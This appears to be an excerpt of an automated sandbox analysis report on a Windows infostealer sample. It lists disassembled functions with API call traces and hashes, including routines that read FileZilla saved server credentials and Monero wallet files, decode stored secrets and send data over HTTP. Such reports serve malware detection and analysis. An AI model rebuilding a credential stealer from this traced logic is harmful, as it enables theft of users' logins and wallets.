                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c1169eb843dff448bc754f89156cb2f21af9af9e297b03bcb80034fc42c3d5f6
                              • Instruction ID: 377a529972cd808e2ff3f516f715a5f4690991336b7d01b7190f04026f6aa4aa
                              • Opcode Fuzzy Hash: c1169eb843dff448bc754f89156cb2f21af9af9e297b03bcb80034fc42c3d5f6
                              • Instruction Fuzzy Hash: 085168F3A082045FF348AE2DDCD577ABBD9EBD4320F26453DEA89D7784E93548018282
                              Function 00D92176 Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b087f5be9f18b2b002f9f595c7c4c26685842132d509624f10e38dd50c31d12c
                              • Instruction ID: d2eedf5cb993dad1cab2c3b9631587f14fdbda09eff2b1d604ae4bfb4585e831
                              • Opcode Fuzzy Hash: b087f5be9f18b2b002f9f595c7c4c26685842132d509624f10e38dd50c31d12c
                              • Instruction Fuzzy Hash: 1D415AF3E083109BE704AE3DDD59766BED6DB90760F2B463DD689CB7C5E83589018281
                              Function 00A69750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00A60250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00A70DBA,00A70DB7,00A70DB6,00A70DB3), ref: 00A60362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A60369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A60385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A603CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A603DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00A60419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A60463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A6051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A6054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A60562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00A60571
                              • lstrcat.KERNEL32(?,url: ), ref: 00A60580
                              • lstrcat.KERNEL32(?,00000000), ref: 00A60593
                              • lstrcat.KERNEL32(?,00A71678), ref: 00A605A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00A605B5
                              • lstrcat.KERNEL32(?,00A7167C), ref: 00A605C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00A605D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00A605E6
                              • lstrcat.KERNEL32(?,00A71688), ref: 00A605F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00A60604
                              • lstrcat.KERNEL32(?,00000000), ref: 00A60617
                              • lstrcat.KERNEL32(?,00A71698), ref: 00A60626
                              • lstrcat.KERNEL32(?,00A7169C), ref: 00A60635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A6068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 507d5faf8edc490bc8663a6c8a925203d4456bcb28d5c3f69a09287b05be769a
                              • Instruction ID: 9a1222a67cada758a26397cd7a9be188bf2c325a0fae1560c986f36186bcae0b
                              • Opcode Fuzzy Hash: 507d5faf8edc490bc8663a6c8a925203d4456bcb28d5c3f69a09287b05be769a
                              • Instruction Fuzzy Hash: A6D11F71910208ABDB04EBE4DE9AEEE7378FF64700F508519F106B7091EE74AA45CFA1
                              Function 00A55960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A559F8
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A55A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A55B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0144F1D0,00000000,?,0144E5E8,00000000,?,00A71A1C), ref: 00A55E71
                              • lstrlen.KERNEL32(00000000), ref: 00A55E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A55E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A55E9A
                              • lstrlen.KERNEL32(00000000), ref: 00A55EAF
                              • lstrlen.KERNEL32(00000000), ref: 00A55ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A55EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00A55F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A55F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A55F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00A55FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00A55FBD
                              • HttpOpenRequestA.WININET(00000000,0144F290,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A55BF8
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00A55FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 5317dc6780af78db2e8eb7f69ea0d3bf459a40a3131064d6a56a4a445b733f92
                              • Instruction ID: 382a1e1835af416d3401ec9c1a86fe7c9d013073cfad687a64c403a3207b45c3
                              • Opcode Fuzzy Hash: 5317dc6780af78db2e8eb7f69ea0d3bf459a40a3131064d6a56a4a445b733f92
                              • Instruction Fuzzy Hash: 4D12C072920118ABDB15EBA0DE96FEEB378BF24700F504599F10A73091EF706A49CF65
                              Function 00A5CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A5D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A5D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D208
                              • lstrcat.KERNEL32(?,00A71478), ref: 00A5D217
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D22A
                              • lstrcat.KERNEL32(?,00A7147C), ref: 00A5D239
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D24C
                              • lstrcat.KERNEL32(?,00A71480), ref: 00A5D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D26E
                              • lstrcat.KERNEL32(?,00A71484), ref: 00A5D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D290
                              • lstrcat.KERNEL32(?,00A71488), ref: 00A5D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D2B2
                              • lstrcat.KERNEL32(?,00A7148C), ref: 00A5D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D2D4
                              • lstrcat.KERNEL32(?,00A71490), ref: 00A5D2E3
                                • Part of subcall function 00A6A820: lstrlen.KERNEL32(00A54F05,?,?,00A54F05,00A70DDE), ref: 00A6A82B
                                • Part of subcall function 00A6A820: lstrcpy.KERNEL32(00A70DDE,00000000), ref: 00A6A885
                              • lstrlen.KERNEL32(?), ref: 00A5D32A
                              • lstrlen.KERNEL32(?), ref: 00A5D339
                                • Part of subcall function 00A6AA70: StrCmpCA.SHLWAPI(01448C78,00A5A7A7,?,00A5A7A7,01448C78), ref: 00A6AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5D3B4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 0070f6d5d807565d86c9019cb29d3345a9e545e0582ffb6dfed37d7026a93a76
                              • Instruction ID: 5adea99ac6c8026fe18fe893adf690145efe983e0e36d4902f9c42ed5bab932e
                              • Opcode Fuzzy Hash: 0070f6d5d807565d86c9019cb29d3345a9e545e0582ffb6dfed37d7026a93a76
                              • Instruction Fuzzy Hash: F9E1DB72910108ABCB04EBA4DE9AFEE7378BF64701F104559F507B7091DE35AA09CFA6
                              Function 00A5C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0144D7A0,00000000,?,00A7144C,00000000,?,?), ref: 00A5CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A5CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00A5CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A5CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A5CAD9
                              • StrStrA.SHLWAPI(?,0144D7D0,00A70B52), ref: 00A5CAF7
                              • StrStrA.SHLWAPI(00000000,0144D710), ref: 00A5CB1E
                              • StrStrA.SHLWAPI(?,0144DDC0,00000000,?,00A71458,00000000,?,00000000,00000000,?,01448C68,00000000,?,00A71454,00000000,?), ref: 00A5CCA2
                              • StrStrA.SHLWAPI(00000000,0144DF80), ref: 00A5CCB9
                                • Part of subcall function 00A5C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A5C871
                                • Part of subcall function 00A5C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A5C87C
                              • StrStrA.SHLWAPI(?,0144DF80,00000000,?,00A7145C,00000000,?,00000000,01448B48), ref: 00A5CD5A
                              • StrStrA.SHLWAPI(00000000,014489A8), ref: 00A5CD71
                                • Part of subcall function 00A5C820: lstrcat.KERNEL32(?,00A70B46), ref: 00A5C943
                                • Part of subcall function 00A5C820: lstrcat.KERNEL32(?,00A70B47), ref: 00A5C957
                                • Part of subcall function 00A5C820: lstrcat.KERNEL32(?,00A70B4E), ref: 00A5C978
                              • lstrlen.KERNEL32(00000000), ref: 00A5CE44
                              • CloseHandle.KERNEL32(00000000), ref: 00A5CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 3919e9703542377821b8985cdf174dce943c942766d54d76f762d1fe43fbadbb
                              • Instruction ID: 7337a113b9f9ea99724755f1f2b5895c7f6a747a252ec354566c57cee6b70968
                              • Opcode Fuzzy Hash: 3919e9703542377821b8985cdf174dce943c942766d54d76f762d1fe43fbadbb
                              • Instruction Fuzzy Hash: F7E1DF72910108ABDB15EFA4DE96FEEB778AF24300F504159F50677191EF306A4ACFA1
                              Function 00A68320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0144B788,00000000,00020019,00000000,00A705B6), ref: 00A683A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A68426
                              • wsprintfA.USER32 ref: 00A68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A6848C
